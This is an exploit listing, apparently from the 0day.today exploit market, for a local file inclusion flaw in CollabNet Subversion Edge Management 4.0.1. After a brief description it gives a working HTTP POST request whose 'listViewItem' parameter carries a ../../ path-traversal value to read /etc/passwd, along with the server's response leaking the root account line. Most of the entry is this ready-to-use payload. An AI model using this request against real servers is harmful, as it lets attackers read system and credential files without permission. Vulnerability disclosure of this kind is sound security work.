[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CollabNet Subversion Edge Management Local file inclusion Vulnerability

Author
DNO
Risk
[
Security Risk High
]
0day-ID
0day-ID-23835
Category
web applications
Date add
07-07-2015
Platform
php
# Exploit Title: Local file inclusion in CollabNet Subversion Edge Management
# Type: Local file inclusion
# Date: 03/07/2015
# Exploit Author: DNO
# Version: 4.0.1
# Tested on: linux "ubuntu"
# CVE :  N/A

========================================
Severity Level:
===============
Medium
===============

=====================
Description:
=====================
The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "listViewItem" parameter of the "index"
action
==========================
Vulnerability:
==========================
  Request:
    POST /csvn/repo/index HTTP/1.1
    Host: EXAMPLE-DNO.COM:4434
    [...]

    id=1&datatable_length=10&listViewItem_../../../../../../etc/passwd=on&_confirmDialogText_copyHook=&_confirmDialogText_renameHook=&_action_downloadHook=Download

  Response:

    HTTP/1.1 200 OK
    Content-Type: text/plain
    Content-disposition: attachment;filename="../../../../../../etc/passwd"
    Content-Length: 1536

    root:x:0:0:root:/root:/bin/bash
===================================
 contact me FB : FB.COM/haker.dyno
 Copyright © 2015 /DNO/

#  0day.today [2024-12-26]  #